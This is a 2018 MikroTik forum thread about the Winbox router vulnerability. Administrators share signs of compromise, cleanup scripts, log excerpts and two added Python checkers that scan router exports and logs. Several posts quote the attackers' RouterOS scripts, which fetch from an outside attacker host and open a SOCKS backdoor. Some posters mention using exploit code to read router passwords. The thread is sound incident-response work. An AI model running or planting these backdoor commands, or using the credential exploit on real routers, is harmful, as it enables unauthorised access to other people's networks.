I am calling for doing that bit extra to inform all and keep an important notice in the picture. Creating the notice in announcements and hoping all is going to be right from there is not working, as is proven now.

Mikrotik has room to improve with the blog as well, and if we keep fighting each other like we are doing now, instead of thinking how to improve the whole Mikrotik ecosystem,
it may lead to Mikrotik thinking we still support how they are doing things, as they have done in the past, and so they keep sitting on the sideline.

If that happens, and it looks now like that, we will have the same discussion again all over in time.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 2:26 pm
by CZFan
At least send a mail to the Mikrotik certified members

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 2:34 pm
by BartoszP
Mikrotik has room to improve with the blog as well...
Rhetorical question: why do people need blogs, tweets or Facebook messages to feel well informed?

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 3:04 pm
by excession
That's it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 3:37 pm
by msatter
Mikrotik has room to improve with the blog as well...
Rhetorical question: why do people need blogs, tweets or Facebook messages to feel well informed?
Because Twitter and Facebook are not widely accepted ways to communicate. Facebook is evil and Twitter 'rate limits' me, so of the visits I make only 10% are successful views. This is not normal.

For me those two ways of communicating don't fly.

The blog is there to have a central, always accessible information source. It sits side by side with the forum, in which one can interact.
The blog is a one-way communication platform, so the information has to be complete and not redirect to other sites for further information. It has to be a single source.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 3:57 pm
by gotsprings
I made this to look for the common stuff. (Copy and paste into terminal.)
...
Open your log and look at the results. If you have a result with "!" you might have a problem.
That's not really usable, is it? Besides, you still need to fix it, and upgrade afterwards.
Methinks, better to check and fix at the same time:
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where  action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}
I even made a bash script, since I needed to fix several dozen routers.
https://pastebin.com/GAtA2mZa
What I put up was to help you determine if you had "been hit". Since I don't know how everyone else in the world set up their routers... I WOULD NOT SCRIPT IN CHANGES. It was merely a "Use this to see if you have some of the common signs of this attack."

What I built for routers I configured removed and made changes based on me knowing what it was going to do to a system.

For instance... I have firewall drop rules that are enabled and disabled based on other input.
Example: If the main ISP is down and system is on cellular. Enable the drop rule on the forwarding of guest traffic.
Now one might argue turning off the accept rule from the guest network would have the same effect...
But placing this at the top of the forwarding chain and setting it to drop ANYTHING from source GuestSubnet will stop the traffic sooner. Especially if the detection script also flushed the connections.
That drop rule is also activated by scheduler as well.

So it's pretty common for one of my routers to have several drop rules disabled under normal operations.

Also... shutting off winbox... that might be bad too.

How about adding a jump chain to blacklist an IP after several unsuccessful log ins... Seems like a great idea too. But not knowing how someone else wrote their firewall...
Or
How about requiring port knocking to people to reach the router at all..
Or
Limiting IP scopes where admin access is available.

Those are all ways to go... but what I put up there was only meant to "look for signs". It's still up to the user to decide what to do about it.

And in your "script scheduler"
There are a few other additions I found. The most common entries I found across A LOT OF ROUTERS were
Schedules named "a" and "schedule3_".
Scripts named "ip" and "script3_"; I saw one instance of something like "script1". Of those scripts.... some did not contain mikrotik.php at all.
So keep that in mind when "looking for signs"

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 8:37 pm
by 43north
That's it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
I grabbed the PHP file before fixing my router. I opened it with notepad and it was completely blank......

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 8:30 am
by normis
It's disappointing that both the httpd vulnerability
We did fix and send on day one.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 9:43 am
by msatter
It's disappointing that both the httpd vulnerability
We did fix and send on day one.
This is referring to this post: viewtopic.php?f=21&t=137572#p678156

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 10:35 am
by rushlife
According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?
Can you read?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 11:14 am
by msatter
According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?
Can you read?

THEN, IS THIS CLEAR INFORMATION? All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. Is your device affected? and ...the same vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

To me this is also obsolete and confusing information, one had to know what the status is on the second of August and the rest is history. Give information about the current required version you have to be not vulnerable and that has to be on top and repeated in the text. This required version can be even higher than the one on the 2018/04/23.

The bugfix is on 6.40.8, also vulnerable if you look at the text above. However, the release date is 2018/04/23. This is confusing, and if you don't go and read the blog you would not know what the status of 6.40.8 is.

All those postings about 6.40.8 need not have been posted if only the TS had given complete and clear information.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 11:15 am
by normis
Well, the linked blog does include this information
Versions that include a fix: 6.40.8 [bugfix] or 6.42.1 [current] released on 25-mar-2018
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 11:42 am
by dada
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
thanks, it is much more clear now. Except that the 6.28 version is vulnerable too. I am able to read usernames/passwords from boards with this version using winbox vulnerability exploit code...

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 12:43 pm
by DummyPLUG
As others said, make a CVE for each vulnerability; it is easier to know if we are talking about the same thing.
for example right now we know which winbox vulnerability we are talking about just because there is only one, if there is another one in future how can we know which one we are talking about? Winbox vulnerability 2017 &20xx?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 12:46 pm
by kobuki
We have added more details, so that it is more clear:
https://blog.mikrotik.com/security/winb ... ility.html
It would be really useful to bump that post with today's date and tag with (UPDATED) or something.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 1:30 pm
by msatter
Well, the linked blog does include this information
Versions that include a fix: 6.40.8 [bugfix] or 6.42.1 [current] released on 25-mar-2018
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
I did write that the blog did contain that information about 6.40.8 and it is much clearer and that pleases me.

Don't distribute the information over different platforms without all of them having the same information.

I am not that harsh because I like to be so. I want Mikrotik to give their customers a better product experience and security.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 3:56 pm
by msatter
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
thanks, it is much more clear now. Except that the 6.28 version is vulnerable too. I am able to read usernames/passwords from boards with this version using winbox vulnerability exploit code...
Please e-mail Mikrotik support with your findings at support@mikrotik.com so they can have a look into that. It will not have any impact on the advice about which minimal RouterOS version has to be used.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 3:57 pm
by msatter
It looks like a CVE has been created, and I don't know enough about whether it was done by the one who discovered this vulnerability or by Mikrotik itself. The CVE number is: CVE-2018-14847

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 4:09 pm
by normis
CVE numbers don't have owners or publishers. Yes, you can use that CVE number to refer to this vulnerability. We will try to make numbers for any next vulnerability, if such would be discovered.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 5:52 pm
by awacenter
We detect these issues and we try to update and upgrade all mikrotik devices.
Besides this, we block all source IPs via BGP when we can and inform our ISP.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 8:17 pm
by honzam
We will try to make numbers for any next vulnerability, if such would be discovered.
I hope no :)

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 9:56 pm
by BrianHiggins
Is there any more detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple of older routers that had not yet been compromised and weren't on 6.40.8 to 6.40.8, only to find those routers compromised today. I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.


Changes I've found in compromised routers

/system logging action
memory-lines set to 1

/ip socks
enabled, port set, connection timeout changed, max connections increased

/ip firewall filter
input chain tcp allow rule to match socks port
drop rules disabled on all chains

/system scripts
one or more scripts added
first script seen calls tool fetch to download files
second script seen makes all changes seen above except memory-lines=1, unclear when / how that's set

/system scheduler
one or more schedules added to call scripts mentioned

/user
add service user account

Other users I've spoken with report finding an empty mikrotik.php text file in /file, though I didn't encounter that myself.

One interesting thing I noted was that the only routers I found compromised were also routers running additional services or with NAT rules exposing services. I'm guessing they didn't scan for 8291; they instead scanned for something else to build the list of IPs to target. Every single router that was otherwise locked down without any services besides 8291 exposed, regardless of build number, remained uncompromised. Might just be a coincidence, but it was worth noting.

EDIT, added sample of scripts found on one of the routers.
/system script
add name=script4_ owner=service policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
    "/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name="port 39593" owner=admin policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/ip firewall filter remove [/ip firewall filter find where comment ~ \"port [0-9]*\"];/ip socks set enabled=yes port=39593 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=39593 action=accept comment=\"port 39593\";/ip firewall filter move [/ip firewall filter find comment=\"port 39593\"] 1;"
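A checker for the configuration changes listed in this post, plus the "a"/"schedule3_" schedule names and "ip"/"script3_"/"script1" script names gotsprings reported. Added example in Python, not a MikroTik tool; it assumes the text of a RouterOS /export, and the sample export below is constructed to mirror the thread's reports.

```python
"""Scan a RouterOS ``/export`` dump for the compromise indicators reported in
this thread.  Added example, not a MikroTik tool; SAMPLE_EXPORT is constructed
after the changes posters reported, not a capture from a real router."""
import re

# Constructed sample /export fragment (IP and port values as posted in the thread).
SAMPLE_EXPORT = """\
/system logging action
set memory memory-lines=1
/ip socks
set enabled=yes port=39593 max-connections=255 connection-idle-timeout=60
/ip firewall filter
add chain=input protocol=tcp port=39593 action=accept comment="port 39593"
add action=drop chain=input comment="defconf: drop all not coming from LAN" disabled=yes in-interface-list=!LAN
add action=drop chain=forward comment="defconf: drop all from WAN not DSTNATed" disabled=yes connection-state=new in-interface-list=WAN
/system script
add name=script4_ owner=service policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name=ip owner=admin policy=read,write source="/ip socks set enabled=yes"
/system scheduler
add name=a interval=1d on-event=script4_
add name=schedule3_ interval=1h on-event=ip
/user
add name=service group=full
"""

# Script and scheduler names gotsprings saw across many compromised routers.
KNOWN_SCRIPT_NAMES = {"ip", "script1", "script3_", "script4_"}
KNOWN_SCHEDULE_NAMES = {"a", "schedule3_"}

_SECTION = re.compile(r"^/(.+)$")
# key=value pairs; a value is either a double-quoted string (with \" escapes) or a bare token
_KV = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Yield (section, verb, {key: value}) for each command line of an export."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _SECTION.match(line)
        if m:                       # a "/ip socks" style line opens a new section
            section = m.group(1).strip()
            continue
        verb, _, rest = line.partition(" ")
        attrs = {k: v.strip('"') for k, v in _KV.findall(rest)}
        yield section, verb, attrs


def scan_export(text):
    """Return one human-readable finding per indicator matched in the export."""
    findings = []
    for section, verb, a in parse_export(text):
        if section == "system logging action" and a.get("memory-lines") == "1":
            findings.append("logging: memory-lines=1 (log history suppressed)")
        elif section == "ip socks" and a.get("enabled") == "yes":
            findings.append("socks: enabled on port %s" % a.get("port", "?"))
        elif section == "ip firewall filter":
            if a.get("action") == "drop" and a.get("disabled") == "yes":
                findings.append("firewall: drop rule disabled in chain %s" % a.get("chain"))
            if (a.get("chain") == "input" and a.get("action") == "accept"
                    and re.fullmatch(r"port \d+", a.get("comment", ""))):
                findings.append("firewall: input accept rule with comment %r" % a["comment"])
        elif section == "system script":
            name, src = a.get("name", ""), a.get("source", "")
            if "/tool fetch" in src or "mikrotik.php" in src.lower():
                findings.append("script %r fetches a remote file" % name)
            elif name in KNOWN_SCRIPT_NAMES or a.get("owner") == "service":
                findings.append("script %r has a name/owner seen on compromised routers" % name)
        elif section == "system scheduler" and a.get("name") in KNOWN_SCHEDULE_NAMES:
            findings.append("scheduler %r matches a name seen on compromised routers" % a["name"])
        elif section == "user" and verb == "add" and a.get("name") == "service":
            findings.append("user 'service' exists")
    return findings


if __name__ == "__main__":
    for finding in scan_export(SAMPLE_EXPORT):
        print("!", finding)
```

Run it against the output of `/export` saved from a router; an empty result only means none of the indicators listed here were present, not that the device is clean.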

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 06, 2018 10:48 pm
by tippenring
Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today.
The conclusion that your routers were not compromised prior to the upgrade to 6.40.8 is invalid. The correct conclusion is that there was no *apparent* indication of compromise. I'll bet you didn't change the admin passwords when you upgraded to 6.40.8. Is that correct? Assuming no password change, someone connected to your router some time ago and downloaded the admin credentials. They only recently logged in and changed your configuration.
I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.
Restricting admin access to only known good source IPs is a good practice. You could also look at port knocking if you need more flexibility.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 12:27 am
by gotsprings
Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today.
The conclusion that your routers were not compromised prior to the upgrade to 6.40.8 is invalid. The correct conclusion is that there was no *apparent* indication of compromise. I'll bet you didn't change the admin passwords when you upgraded to 6.40.8. Is that correct? Assuming no password change, someone connected to your router some time ago and downloaded the admin credentials. They only recently logged in and changed your configuration.
I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.
Restricting admin access to only known good source IPs is a good practice. You could also look at port knocking if you need more flexibility.
I looked over the log of another installers router.

[admin@MikroTik] /log> print
jul/06 21:10:09 system,info verified routeros-arm-6.42.5.npk
jul/06 21:10:09 system,info installed routeros-arm-6.42.5

jul/16 12:00:50 system,info,account user admin logged in from 194.40.240.254 via winbox
jul/16 12:00:53 system,info,account user admin logged in from 194.40.240.254 via telnet
jul/16 12:00:54 system,info socks config changed by admin
jul/16 12:00:55 system,info filter rule added by admin
jul/16 12:00:55 system,info filter rule moved by admin
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via winbox
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via telnet

jul/24 21:58:07 system,info,account user admin logged in from 185.153.198.228 via winbox
jul/24 21:58:10 system,info,account user admin logged in from 185.153.198.228 via telnet
jul/24 21:58:11 system,info user service added by admin
jul/24 21:58:11 system,info filter rule removed by admin
jul/24 21:58:12 system,info socks config changed by admin
jul/24 21:58:13 system,info filter rule added by admin
jul/24 21:58:13 system,info filter rule moved by admin
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via winbox
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via telnet

When they updated they didn't change the password.
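The log pattern above (a short Winbox plus telnet login from an unknown address, a few config changes, logout) can be pulled out of a `/log print` dump automatically. Added example in Python, not a MikroTik tool; the log lines are constructed after the ones posted here, and the trusted management networks are an assumption you supply.

```python
"""Triage a RouterOS ``/log print`` dump: list admin sessions opened from
addresses outside the trusted management networks and the configuration
changes made while those sessions were open.  Added example, not a MikroTik
tool; SAMPLE_LOG is constructed after the excerpt posted in this thread."""
import ipaddress
import re
from collections import namedtuple

# Constructed sample log, shaped like the posted excerpt (one foreign session,
# one legitimate LAN session).
SAMPLE_LOG = """\
jul/06 21:10:09 system,info installed routeros-arm-6.42.5
jul/16 12:00:50 system,info,account user admin logged in from 194.40.240.254 via winbox
jul/16 12:00:53 system,info,account user admin logged in from 194.40.240.254 via telnet
jul/16 12:00:54 system,info socks config changed by admin
jul/16 12:00:55 system,info filter rule added by admin
jul/16 12:00:55 system,info filter rule moved by admin
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via winbox
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via telnet
jul/20 09:15:02 system,info,account user admin logged in from 192.168.88.10 via winbox
jul/20 09:16:40 system,info filter rule added by admin
jul/20 09:17:01 system,info,account user admin logged out from 192.168.88.10 via winbox
"""

# when: timestamp of the first login; services: every service used in the
# session; changes: config-change messages logged by that user while open.
Finding = namedtuple("Finding", "when user address services changes")

_LOGIN = re.compile(
    r"^(?P<when>\S+ \S+) \S+ user (?P<user>\S+) logged (?P<dir>in|out) "
    r"from (?P<addr>\S+) via (?P<svc>\S+)$")
_CHANGE = re.compile(r"^(?P<when>\S+ \S+) \S+ (?P<what>.+?) by (?P<user>\S+)$")


def find_foreign_sessions(log_text, trusted_networks):
    """Return a Finding for every session opened from outside trusted_networks.

    A session is keyed on (user, address) and stays open until every service
    that logged in has logged out.  Changes are attributed by username, so if
    the same user is simultaneously logged in from a trusted address the
    changes cannot be told apart; that is a known limit of RouterOS logging.
    """
    trusted = [ipaddress.ip_network(n) for n in trusted_networks]
    active = {}      # (user, addr) -> [Finding, number of services still logged in]
    findings = []
    for line in log_text.splitlines():
        m = _LOGIN.match(line)
        if m:
            key = (m["user"], m["addr"])
            if m["dir"] == "in":
                if any(ipaddress.ip_address(m["addr"]) in net for net in trusted):
                    continue                      # management login, not of interest
                entry = active.setdefault(
                    key, [Finding(m["when"], m["user"], m["addr"], [], []), 0])
                entry[0].services.append(m["svc"])
                entry[1] += 1
            elif key in active:
                active[key][1] -= 1
                if active[key][1] == 0:           # last service logged out
                    findings.append(active.pop(key)[0])
            continue
        m = _CHANGE.match(line)
        if m:
            for (user, _), (finding, _) in active.items():
                if user == m["user"]:
                    finding.changes.append(m["what"])
    # sessions never closed in the dump are still reported
    findings.extend(entry[0] for entry in active.values())
    return findings


if __name__ == "__main__":
    for f in find_foreign_sessions(SAMPLE_LOG, ["192.168.88.0/24"]):
        print("%s %s from %s via %s" % (f.when, f.user, f.address, "+".join(f.services)))
        for change in f.changes:
            print("    ", change)
```

Note that this only works if the attacker did not set memory-lines=1 first; the empty log that results is itself a sign worth acting on.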

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 1:12 am
by tippenring

When they updated they didn't change the password.
No, the attacker didn't change the password. If he did, that would give away that the router had been compromised. The attacker didn't want you to know he had the admin password for the router. So, you upgraded software, but did not change the password that the attacker obtained when you were running the vulnerable version.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 1:38 am
by gotsprings
Tippenring.

I was agreeing with you. The logs were proof that 2 different attackers had the password from before the upgrade

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 5:36 am
by aswin
I have one remote router (CCR1009 v6.40.7) which was infected with the "sys" virus/spyware version 30RC9 on 2 Aug. This spyware locked my "admin" account to read-only, created a "sys" account with full read/write policy and also restricted the allowed login address to 127.0.0.1 only. The script also changes the time of reformat-hold-button and reformat-hold-button-max every second.
I used the exploit which can get the "sys" password, but I don't know how to log in to the router and reset it to factory configuration. Can I use the serial port for console login, or do I need to reset the NAND chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 7:12 am
by tippenring
Tippenring.

I was agreeing with you. The logs were proof that 2 different attackers had the password from before the upgrade
I misunderstood your post. My apologies.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 8:08 am
by normis
I have one remote router (CCR1009 v6.40.7) which was infected with the "sys" virus/spyware version 30RC9 on 2 Aug. This spyware locked my "admin" account to read-only, created a "sys" account with full read/write policy and also restricted the allowed login address to 127.0.0.1 only. The script also changes the time of reformat-hold-button and reformat-hold-button-max every second.
I used the exploit which can get the "sys" password, but I don't know how to log in to the router and reset it to factory configuration. Can I use the serial port for console login, or do I need to reset the NAND chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
1) Wait, so you have the "sys" password? What is it? I think it will be useful for others to find out too.
2) Just log in with Winbox username "sys" and the password that you found. What is the question?

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 8:22 am
by grusu
As far as I can see in the first picture, the sys user can log only from IP 127.0.0.1 so you can only try from the serial port.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 9:26 am
by aswin
I have one remote router (CCR1009 v6.40.7) which was infected with the "sys" virus/spyware version 30RC9 on 2 Aug. This spyware locked my "admin" account to read-only, created a "sys" account with full read/write policy and also restricted the allowed login address to 127.0.0.1 only. The script also changes the time of reformat-hold-button and reformat-hold-button-max every second.
I used the exploit which can get the "sys" password, but I don't know how to log in to the router and reset it to factory configuration. Can I use the serial port for console login, or do I need to reset the NAND chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
1) Wait, so you have the "sys" password? What is it? I think it will be useful for others to find out too.
2) Just log in with Winbox username "sys" and the password that you found. What is the question?
1. I have tried to read this topic viewtopic.php?f=2&t=131166&p=646273&hil ... ys#p646273 but with no success because of the newer spyware version. I just googled on the internet and there are exploits which can use the Mikrotik vulnerability to get the Mikrotik password easily (python + script + destination IP). So now I understand why this bug can spread so fast to the many Mikrotik routers not patched to a safe baseline version (including me 555).
https://ibb.co/jh2Siz

2. I have tried to log in to the remote Mikrotik with that password but with no success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable hard reset, so I am just asking whether I can use the serial cable to log in. (The infected router is still located at another place.)

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 9:29 am
by Jotne
The title of this thread is somewhat misleading:
Winbox vulnerability: please upgrade
It looks like Winbox is the problem, not the RouterOS.
It does not help to upgrade the Winbox :)

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 9:42 am
by normis
The title of this thread is somewhat misleading:
Winbox vulnerability: please upgrade
It looks like Winbox is the problem, not the RouterOS.
It does not help to upgrade the Winbox :)
This is why sometimes reading is important. Quote:
vulnerability in the RouterOS Winbox service, that was patched in RouterOS
Steps to be taken: Upgrade RouterOS to the latest release
Is it really so hard to read more than the first 4 words?

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 9:46 am
by Jotne
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
When you set up a default NAT, it looks like all service ports are blocked from the outside.
Do I still need to specify where Winbox should be allowed from?
/ip service set winbox address=192.168.88.0/24
I only have two users on the net, me and my wife :)

Also, when I secure the http and winbox services using IP, I cannot see any log from RouterOS that someone not on that IP (range) tried to log in. This should be logged, as I can do with a normal FW/NAT/Mangle rule. I would then be able to see if my security upgrade does help me!!

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 4:48 pm
by gotsprings
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
When you set up a default NAT, it looks like all service ports are blocked from the outside.
Do I still need to specify where Winbox should be allowed from?
/ip service set winbox address=192.168.88.0/24
I only have two users on the net, me and my wife :)

Also, when I secure the http and winbox services using IP, I cannot see any log from RouterOS that someone not on that IP (range) tried to log in. This should be logged, as I can do with a normal FW/NAT/Mangle rule. I would then be able to see if my security upgrade does help me!!
Add this to your firewall.

/ip firewall filter add chain=input src-address=!192.168.88.0/24 protocol=tcp dst-port=8291 action=passthrough log=yes log-prefix="Winbox External Probe" place-before=1

That would give you a counter and log entry

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 8:06 pm
by kobuki
2. I have tried to log in to the remote Mikrotik with that password but with no success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable hard reset, so I am just asking whether I can use the serial cable to log in. (The infected router is still located at another place.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 07, 2018 10:12 pm
by Jotne

/ip firewall filter add chain=input src-address=!192.168.88.0/24 protocol=tcp dst-port=8291 action=passthrough log=yes log-prefix="Winbox External Probe" place-before=1

That would give you a counter and log entry
Thanks, did not think of that :)

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:11 am
by aswin
2. I have tried to log in to the remote Mikrotik with that password but with no success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable hard reset, so I am just asking whether I can use the serial cable to log in. (The infected router is still located at another place.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Thank you kobuki for your suggestion. Perfect!! Now I can remotely log in to the infected router with user "sys" via SOCKS.
Thank you again. It can save a lot of time for me instead of requesting client to send router back to me .

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:17 am
by kobuki
Now I can remotely log in to the infected router with user "sys" via SOCKS.
Good! Thanks for the feedback. Your attacker was a particularly malicious one, almost locking you out completely. Almost.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:41 am
by excession
That's it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
I grabbed the PHP file before fixing my router. I opened it with notepad and it was completely blank......
Interesting thanks, I wonder then if the empty file is just a byproduct of the fetch command and the point is to execute the PHP file on that web server rather than download it. Perhaps it’s part of the command and control system and by calling this file the router is checking in. Certainly such a call would provide a loggable IP address.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:44 am
by kobuki
It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:45 am
by excession
2. I have tried to log in to the remote Mikrotik with that password but with no success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable hard reset, so I am just asking whether I can use the serial cable to log in. (The infected router is still located at another place.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 2:52 am
by 43north
It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
As I mentioned my file was empty as well, makes sense with what you guys are saying.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 3:00 am
by kobuki
Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 3:19 am
by excession
Is he trying to use Winbox to connect
No idea, but possible.
how would you route a Winbox connection through a socks proxy?
I assume that's a rhetorical question.
Haha, actually no, just one based on an almost complete ignorance of socks!
I did just find some interesting discussion here: viewtopic.php?t=101874
I think I now understand: I imagine he used an ssh client to open the socks connection then ssh to connect to his router through that tunnel.

